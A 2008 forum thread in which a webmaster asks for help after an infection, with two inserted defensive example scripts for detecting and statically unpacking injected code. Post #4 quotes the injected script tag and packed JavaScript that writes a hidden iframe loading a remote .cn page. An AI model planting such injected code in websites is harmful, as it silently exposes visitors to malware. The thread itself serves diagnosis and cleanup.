Site infected by Virus traffic reduced to 200 from 10 thousand

Discussion in 'Site & Server Administration' started by neeshu, Aug 7, 2008.

  1. #1
    My site, which had decent traffic, now seems to be infected by some virus, due to which Google has blocked my pages in its search engine. What do I do now?

    I see an extra line added to every page of my site, which calls a functions.js file after the closing html tag. Please help me remove this problem and get my site back to normal.
    Thanks

    my site www.neeshu.com
     
    neeshu, Aug 7, 2008 IP
  2. hans

    hans Well-Known Member

    Messages:
    2,923
    Likes Received:
    126
    Best Answers:
    1
    Trophy Points:
    173
    #2
    since your site is offline now, it's impossible to see what type of site you have and what kind of content you had that might hide virus / trojans.

    typically
    any / every site who allows member login and file upload of ANY file type may become subject to hosting trojans/virus/malware !

    hence, before getting online again you REALLY need to FIND the entry point where, how and who uploaded malware of any kind.
    any graphic file or text file or mp3, any file that loads into a browser or displays into a browser or requires install of a plugin in your browser may be the source - also plain txt files or js files.

    if YOU are the only contributor to entire site's content, then you have to inspect all files YOU ever uploaded.

    NO matter how many hundred or thousands of hrs you need to actually FIND the origin of your malware.
    check ALL your server logs, error_log, access_log.

    among many methods,
    get / download a full copy of ALL site-files into your PC - then run a fully updated virus scan across ALL files to find possible infected files.
    once you have that file(s) - search your server logs to see when and who uploaded / modified that file.
    then figure out how it was done ( find the HOLE YOU have left open on your site ) and study the case then close/secure all properly.

    it takes time. years ago I had a security problem and it took some 3 weeks day and night work to figure all out and secure all properly.

    final conclusion:
    make sure you have only content created BY YOU and UPLOADED by YOU on your site, else above problem may repeat again and again over time.

    God bless
     
    hans, Aug 7, 2008 IP
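An added example, not part of hans's post or any poster's code: one way to apply the "download a full copy, find the infected files, then search the logs" procedure to this thread's symptom, a script tag appended after the closing html tag. The function names, the file-extension list and the oldest-first ordering are assumptions, and modification times only help if the copy preserved the server's timestamps.

```javascript
// Added example: find script tags appended after </html> in a local copy of
// the site and list affected files oldest-first, to bound the access_log search.

// Script src values that appear after the last closing </html> tag.
function scriptsAfterHtmlClose(html) {
  const close = /<\/html\s*>/gi;
  let end = -1;
  while (close.exec(html) !== null) end = close.lastIndex;
  if (end < 0) return []; // no closing tag: nothing can be "after" it
  const tail = html.slice(end);
  const tag = /<script\b[^>]*\bsrc\s*=\s*["']?([^"'\s>]+)[^>]*>/gi;
  const srcs = [];
  let m;
  while ((m = tag.exec(tail)) !== null) srcs.push(m[1]);
  return srcs;
}

// Walk the copy; fs and path are passed in (Node's modules when run as a CLI).
function scanTree(dir, fs, path) {
  const findings = [];
  for (const entry of fs.readdirSync(dir, { withFileTypes: true })) {
    const full = path.join(dir, entry.name);
    if (entry.isDirectory()) {
      findings.push(...scanTree(full, fs, path));
    } else if (/\.(html?|php|tpl)$/i.test(entry.name)) { // assumed page types
      const srcs = scriptsAfterHtmlClose(fs.readFileSync(full, 'latin1'));
      if (srcs.length) findings.push({ file: full, mtimeMs: fs.statSync(full).mtimeMs, srcs });
    }
  }
  return findings;
}

// One line per infected file, earliest modification first.
function timeline(findings) {
  return findings.slice().sort((a, b) => a.mtimeMs - b.mtimeMs)
    .map((f) => `${new Date(f.mtimeMs).toISOString()} ${f.file} -> ${f.srcs.join(',')}`);
}

// CLI use: node scan.js /path/to/site-copy
if (typeof require !== 'undefined' && typeof module !== 'undefined' &&
    require.main === module && process.argv[2]) {
  console.log(timeline(scanTree(process.argv[2], require('fs'), require('path'))).join('\n'));
}
```

The earliest timestamp in the output is the point from which to read access_log and the FTP or upload logs.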
  3. neeshu

    neeshu Well-Known Member

    Messages:
    648
    Likes Received:
    11
    Best Answers:
    0
    Trophy Points:
    130
    #3
    Thanks for the valuable advice. I sent the site offline because of the virus. It's on now, let me know if you see the virus.
     
    neeshu, Aug 7, 2008 IP
  4. neeshu

    #4
    Can someone tell me how I get my website back into Google search?


    Today I opened my site on the office PC and saw this virus error from ESET NOD32
    saying some malicious script has infected my page. I checked the page in Firefox and saw this line added to my page:


    
        <script language="javascript" src="/functions.js"  type="text/javascript"></script>
    
    the js file has this code
    
    
     eval(function(p,a,c,k,e,d){e=function(c){return c.toString(36)};if(!''.replace(/^/,String)){while(c--){d[c.toString(a)]=k[c]||c.toString(a)}k=[function(e){return d[e]}];e=function(){return'\\w+'};c=1};while(c--){if(k[c]){p=p.replace(new RegExp('\\b'+e(c)+'\\b','g'),k[c])}}return p}('d.f("<1 7=\'8://6.4/2.3?5\' 9=\'0\' e=\'0\' c=\'a:b\'></1>");',16,16,'|iframe|in|cgi|cn||orentraff|src|http|width|display|none|style|document|height|write'.split('|'),0,{}))
     
    neeshu, Aug 7, 2008 IP
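An added example, not part of the original post: the functions.js quoted above uses the common eval(function(p,a,c,k,e,d){...}) packer wrapper, and its arguments can be decoded as plain data without ever running the script. The function names are hypothetical; the sample string is the argument tail copied from the post.

```javascript
// Static unpacker for the eval(function(p,a,c,k,e,d){...}) wrapper: it reads
// the packer's arguments as data and never evaluates the script.

// Argument tail of the functions.js quoted in post #4 (decoder body omitted).
const PACKED = String.raw`return p}('d.f("<1 7=\'8://6.4/2.3?5\' 9=\'0\' e=\'0\' c=\'a:b\'></1>");',16,16,'|iframe|in|cgi|cn||orentraff|src|http|width|display|none|style|document|height|write'.split('|'),0,{}))`;

const ARGS = /\}\s*\(\s*'((?:\\.|[^'\\])*)'\s*,\s*(\d+)\s*,\s*(\d+)\s*,\s*'((?:\\.|[^'\\])*)'\s*\.split\('\|'\)/;

// Undo JavaScript string-literal escaping (\' \\ \n ...) without eval.
function unescapeLiteral(s) {
  const named = { n: '\n', r: '\r', t: '\t' };
  return s.replace(/\\([\s\S])/g, (_, ch) => (ch in named ? named[ch] : ch));
}

// Token the packer emits for keyword index c in base a (a <= 62).
function encodeIndex(c, a) {
  const hi = c < a ? '' : encodeIndex(Math.floor(c / a), a);
  const lo = c % a;
  return hi + (lo > 35 ? String.fromCharCode(lo + 29) : lo.toString(36));
}

// Returns the unpacked source text, or null if no packer call is found.
function unpack(source) {
  const m = ARGS.exec(source);
  if (!m) return null;
  const payload = unescapeLiteral(m[1]);
  const base = Number(m[2]), count = Number(m[3]);
  const words = unescapeLiteral(m[4]).split('|');
  const dict = new Map();
  for (let i = 0; i < count; i++) {
    const token = encodeIndex(i, base);
    dict.set(token, words[i] || token); // empty slot: token stands for itself
  }
  return payload.replace(/\b\w+\b/g, (t) => (dict.has(t) ? dict.get(t) : t));
}

// Triage helper: src of every iframe that is zero-sized or display:none.
function hiddenIframeSources(text) {
  const out = [];
  for (const tag of text.match(/<iframe\b[^>]*>/gi) || []) {
    const hidden = /\b(?:width|height)\s*=\s*['"]?0\b|display\s*:\s*none/i.test(tag);
    const src = /\bsrc\s*=\s*['"]?([^'"\s>]+)/i.exec(tag);
    if (hidden && src) out.push(src[1]);
  }
  return out;
}

console.log(unpack(PACKED));
```

The decoded text is a single document.write of a zero-sized, display:none iframe, so every visitor's browser silently loads a third-party URL, which is what the antivirus and Google reacted to.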
  5. hans

    #5
    remove virus
    clean up entire site
    FIND how the virus got into your site
    SECURE the hole
    then ask G for reinstatement explaining what you did to secure your site and guarantee that such infringement NEVER EVER occurs in your entire life.
    you have to prove TO KNOW what you do !!
    to do so you have to assure that ONLY YOU are in control of entire site and no one else uploads any files - including NO hackers!

    it's your site = your work = study, google, learn and solve. it's part of having a site. we all have to do our own homework!
     
    hans, Aug 7, 2008 IP
  6. neeshu

    #6
    I think it's because of the image upload option that the virus got into it, or maybe Servage servers are infected. I contacted them and they asked me the trojan name. Since I am not using nod32, I have no idea what the virus name is; only nod32 is detecting a virus.

    Thanks a lot for the motivational words, hans. I hope I can undo all that went wrong here.
     
    neeshu, Aug 7, 2008 IP
  7. hans

    #7
    as long as you allow image upload OR ANY file upload, you ALWAYS will be hosting virus and other malware !!
    hence better get used to getting banned or deindexed by G and other major SE
    or
    change your site policy and create all content yourself !!
    and
    as long as you don't know where the virus is or how it got onto your site, you won't be able to really solve / secure your site.

    mod_security and/or snort may (partially) solve your security issues. both however require that you have your OWN dedicated server and are your own server admin.

    image and file hosting services may need to get used to this type of problems in addition to copyright infringement lawsuits ...
    always think twice if you are that rich to afford to CREATE YOUR own problems. if you can afford to CREATE such problems by having this type of site, then you also have to afford to SOLVE all the ongoing consequences.

    if you do as I said MUCH earlier - download ALL onto your PC and use a quality virus scanner - then you get all the IDs you need,
    but you still need to do all the access_log study to find the entrance point / source of your malware.

    Good luck
     
    hans, Aug 8, 2008 IP
  8. neeshu

    #8
    thanks hans for the valuable advice :)
     
    neeshu, Aug 8, 2008 IP
  9. TheHosted

    TheHosted Guest

    Messages:
    41
    Likes Received:
    0
    Best Answers:
    0
    Trophy Points:
    0
    #9
    Are you on shared hosting? If you are, I would talk to your host and see if it is a server-wide problem. I would be worried your server was compromised.
     
    TheHosted, Aug 8, 2008 IP